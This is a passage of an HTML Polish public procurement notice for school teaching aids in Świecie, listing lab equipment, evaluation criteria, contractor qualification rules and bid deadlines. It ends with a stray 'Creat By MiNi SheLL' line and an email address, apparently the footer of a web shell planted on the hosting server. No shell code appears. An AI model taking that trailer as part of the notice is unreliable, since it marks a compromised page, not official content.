(zasada potasowa, płatki) – 1 szt., wodorotlenek sodu (zasada sodowa, granulki) – 1 szt., wodorotlenek wapnia – 1 szt., żelazo (metal- drut Ø 1 mm)	– 1 szt., żelazo (proszek) – 1 szt., zestaw szkieł laboratoryjnych (202 szt.) – 2 zestawy, kolba miarowa z korkiem –1 szt., kolba miarowa z korkiem – 1 szt., kolba miarowa z korkiem – 4 szt., kolba miarowa z korkiem – 2 szt., kolba miarowa z korkiem –	7 szt., kolba miarowa z lejkiem – 1 szt., kolba miarowa cukrownicza – 1 szt., pipeta jednomiarowa – 1 szt., pipeta jedno-miarowa –1 szt., pipeta wielomiarowa – 1 szt., pipeta Pasteura – 10 szt., pipetka – kroplomierz 30 ml - 2 szt., pipetka – kroplomierz 60 ml - 1 szt., pipetka – kroplomierz 100 ml - 1 szt., pipetka – kroplomierz 250 ml - 1 szt., cylinder miarowy z korkiem– 1 szt., cylinder miarowy z wylewem – 1 szt., cylinder kolorymetryczny (komplet) – 2 szt., cylinder kolorymetryczny (komplet) – 2 szt., kolba Erlenmayera ze szlifemi korkiem – 1 szt., kolba Erlenmayera ze szlifem i korkiem – 2 szt., kolba Erlenmayera ze szlifem – 14 szt., kolba Erlenmayera – 4 szt. kolba Erlenmayera – 1 szt., kolba płaskodenna ze szlifem – 1 szt., kolba kulista ze szlifem – 1 szt., rozdzielacz (wkraplacz) – 1 szt., probówka ze szlifem i korkiem 10 ml – 1 szt., probówka ze szlifem i korkiem 25 ml – 1 szt., probówka ze szlifem i korkiem 50 ml – 1 szt., probówka – 25 szt., probówka – 20 szt., probówka bor-krzem – 10 szt., probówka bor-krzem – 10 szt., U – rurka z lejkiem – 1 szt., bagietka – 4 szt., rurki różnych średnic – 4 szt., rurki różnych kształtów – 7 szt., rurka osuszająca (do spalania) –1 szt., rozpylacz płomienia– 1szt., szalki Petriego (komplet) –	2 szt., zlewka szklana – 7 szt., zlewka szklana – 5 szt., zlewka szklana – 1 szt., zlewka PP –7 szt., zlewka PP – 5 szt., zlewka PP –1 szt., lejek laboratoryjny PP – 1 szt., lejek laboratoryjny szklany – 1 szt., termometr laboratoryjny – 1 szt., tryskawka PP – 1 szt., palnik spirytusowy – 1szt., statyw wielostanowiskowy do probówek – 1 szt., trójnóg okrągły – 1 szt., siateczka do podgrzewania –1 szt., uchwyt do probówek – 2 szt., papierki lakmusowe (komplet) –1 szt., łącznik do węży – 1 szt., zaciskacz do węży – 1 szt., szczotka do mycia probówek – 2 szt., wężyki różnych średnic – 3 szt., korki polietylenowe – 1 szt., korki polietylenowe – 1 szt., korki polietylenowe –1 szt., korki polietylenowe – 2 szt., korki gumowe z otworem i bez – 7 szt., łyżeczka do spalań – 1 szt.<br/><br/>2)	pracownia biologiczna: Mikroskop z podłączeniem do komputera – 1 szt., zestaw wyposażenia do pracowni biologicznej – 1 zestaw, w skład zestawu wchodzi: jodyna – 2 szt., płyn Lugola – 1 szt., kwas siarkowy rozcieńczony – 1 szt., siarczan miedzi – 1 szt., wodorowęglan sodu – 1 szt., winian sodowo-potasowy –1 szt., sudan III - 100 g – 1 szt., Przewodniki roślin i zwierząt – 4 szt., Proste klucze do oznaczania roślin – 4 szt., preparaty mikroskopowe (protisty) – zestaw 10 szt.<br/><br/>3)	pracownia fizyczna: Zestaw wyposażenia do pracowni fizycznej – 1 zestaw, w skład zestawu wchodzi: wskaźnik laserowy – 1 szt., soczewki skupiające o różnych ogniskowych – 1 zestaw – po 6 szt. w zestawie, statyw do mocowania soczewek – 1 szt., taśma miernicza – 4 szt., stoper – 4 szt., mierniki uniwersalne – 4 szt., zestaw do nauki elektryczności – 1 zestaw, zasilacz o regulowanym napięciu – 1 szt. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa pomocy dydaktycznych do pracowni przedmiotowych <br/>w ramach realizacji projektu „Stawiamy na przyszłość” współfinansowanego ze środków Europejskiego Funduszu Społecznego Osi priorytetowej 10. Innowacyjna edukacja, Działania 10.2 Kształcenie ogólne i zawodowe, Poddziałania 10.2.2 Kształcenie ogólne w ramach Regionalnego Programu Operacyjnego dla Województwa Kujawsko – Pomorskiego na lata 2014-2020.<br/><br/>2.	Opis części zamówienia: Całość zamówienia podzielono na 4 części.<br/><br/>3.	Część 4: Dostawa pomocy dydaktycznych do pracowni przedmiotowych w Szkole Specjalnej Przysposabiającej do Pracy nr 1 im. Jana Pawła II w Świeciu z siedzibą przy ul. Paderewskiego 5A:<br/>Zestaw szkolnych robotów zawierający m.in. min. 2 roboty, min. 2 zestawy puzzli podstawowych, min. 2 zestawy puzzli dodatkowych, min 2 zestawy puzzli AR, min. 4 komplety flamastrów, dostęp do kursu online i pakiety scenariuszy zawierające propozycje zajęć o różnej tematyce, z zakresu różnych edukacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamowienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie określa <br/>w tym zakresie szczegółowych wymagań;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: Zamawiający nie określa w tym zakresie szczegółowych wymagań;<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie określa w tym zakresie szczegółowych wymagań;<br/>4)	zdolności technicznej lub zawodowej: Zamawiający nie określa w tym zakresie szczegółowych wymagań. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Podmiotowe środki dowodowe wymagane od Wykonawcy w celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału w postępowaniu o oddzielenia zamówienia publicznego obejmują:<br/>1)	informację z Krajowego Rejestru Karnego w zakresie: <br/>a) art. 108 ust. 1 pkt 1 i 2 ustawy Pzp;<br/>b) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego - sporządzoną nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (T. j. Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy <br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>4)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych w art. 108 ust. 1 pkt 3 i 6 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego<br/>2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 1 i 2 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa ust. 1 pkt 1, powinien być wystawiony nie wcześniej niż 6 miesięcy przed jego złożeniem. Dokumenty, o których mowa ust. 1 pkt 2, powinny być wystawione nie wcześniej niż 3 miesięcy przed ich złożeniem.<br/>3.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 pkt 1 i 2 SWZ, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Formularz ofertowy - zgodnie z Załącznikiem nr 1a/1b/1c/1d do Specyfikacji Warunków Zamówienia;<br/>2) Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu wykluczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp – Załącznik nr 3 do SWZ;<br/>3)	dokumenty, z których wynika prawo do podpisania oferty, odpowiednie pełnomocnictwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Oświadczenie z art. 125 ust. 1 ustawy Pzp, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmian w umowie w zakresie: <br/>1)	zmiany osoby do kontaktu ze strony Wykonawcy lub zmiany osoby do kontaktu <br/>ze strony Zamawiającego; <br/>2)	zaistnienia obiektywnych, niezależnych od stron przeszkód w realizacji umowy <br/>w dotychczasowym kształcie;<br/>3)	wystąpienia uzasadniających zdarzeń losowych po stronie Wykonawcy;<br/>4)	wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy. <br/>2.	Zmiana postanowień zawartej umowy może nastąpić również w przypadku zmiany powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia.<br/>3.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie <br/>w postaci aneksów do umowy, pod rygorem nieważności takiej zmiany.<br/>4.	Przewidziane powyżej okoliczności stanowiące podstawę zamian do umowy, stanowią uprawnienia Zamawiającego, a nie jego obowiązek wprowadzenia takich zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-10 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-11</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com